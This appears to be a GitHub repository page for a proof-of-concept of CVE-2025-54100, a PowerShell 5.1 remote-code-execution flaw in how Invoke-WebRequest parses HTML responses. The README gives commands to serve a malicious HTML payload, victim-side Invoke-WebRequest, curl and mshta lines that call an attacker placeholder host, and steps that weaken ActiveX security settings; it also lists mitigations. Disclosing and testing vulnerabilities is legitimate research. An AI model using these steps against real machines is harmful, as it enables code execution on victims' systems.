Skip to content

ThemeHackers/CVE-2025-54100

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

36 Commits
.gitignore
.gitignore
 
 
LICENSE
LICENSE
 
 
README.md
README.md
 
 
app.py
app.py
 
 
poc.png
poc.png
 
 
requirements.txt
requirements.txt
 
 

Repository files navigation

CVE-2025-54100 – PowerShell Response Parsing PoC

A concise Proof-of-Concept showing how CVE-2025-54100 can lead to Remote Code Execution (RCE) in Windows PowerShell 5.1 through malicious HTML parsing.

Table of Contents

What is CVE-2025-54100?

  • Type: Command injection in Invoke-WebRequest when not using -UseBasicParsing
  • Severity: CVSS 7.8 (High)
  • Root cause: MSHTML-based parsing of HTML responses allows script execution (e.g., ActiveXObject) in the caller’s context.
  • Affected: Windows 10/11 and Windows Server 2008-2025 running PowerShell 5.1.

How the PoC Works

  1. The FastAPI server in CVE-2025-54100.py serves a crafted HTML payload.
  2. The payload attempts to instantiate WScript.Shell / Shell.Application ActiveX objects.
  3. On vulnerable hosts, the MSHTML parser executes the script, demonstrating RCE by launching calc.exe.
  4. The supplied payload is intentionally minimal and non-destructive but can be modified for further research.

Quick Start

Prerequisites

  • Python 3.10+ (tested with FastAPI & Uvicorn)
  • Install dependencies: 
    python3 -m venv .venv
source .venv/bin/activate
pip3 install -r requirements.txt

Run the malicious server

Start the PoC HTTP server:

uvicorn app:app --host 0.0.0.0  --port 8888 --reload

Triggering From a Victim Host

Run these on a vulnerable Windows machine without -UseBasicParsing:

# Invoke-WebRequest
Invoke-WebRequest -Uri "http://<attacker-ip>:8888"
# curl alias
curl http://<attacker-ip>:8888
# mshta
mshta http://<attacker-ip>:8888

Use the same port you configured for the server. If vulnerable, the embedded script executes via the MSHTML parser. Some AV products may block the behavior even though the parsing issue is present.

Troubleshooting & Verification

If calc.exe does not appear:

  1. Open Internet Options on the victim.
  2. Go to SecurityCustom level...
  3. Enable “Initialize and script ActiveX controls not marked as safe for scripting.”
  4. Re-run Invoke-WebRequest without -UseBasicParsing.

This demonstrates the execution vector. Real-world payloads may use obfuscation or additional bypasses to evade default restrictions.

Evidence

PoC

Mitigation

Microsoft patched the issue in December 2025:

  1. Apply security updates on affected Windows hosts.
  2. Use -UseBasicParsing to avoid MSHTML parsing: 
    Invoke-WebRequest -Uri "http://<attacker-ip>:8888" -UseBasicParsing
  3. Move to PowerShell 7+ (pwsh), which does not rely on MSHTML for parsing.

Disclaimer

Warning

For educational and authorized testing only. Use responsibly and comply with all applicable laws. The authors are not liable for misuse or damage.

References

About

CVE-2025-54100 (CVSS 7.8 High) is a command injection vulnerability in the Invoke-WebRequest cmdlet of Windows PowerShell 5.1. It arises from improper neutralization of special elements during the automatic parsing of Web responses.

Topics

powershell poc rce cve-2025-54100

Resources

Readme

License

MIT license
Activity

Stars

26 stars

Watchers

0 watching

Forks

7 forks
Report repository

Releases

No releases published

Packages

 
 
 

Contributors

Languages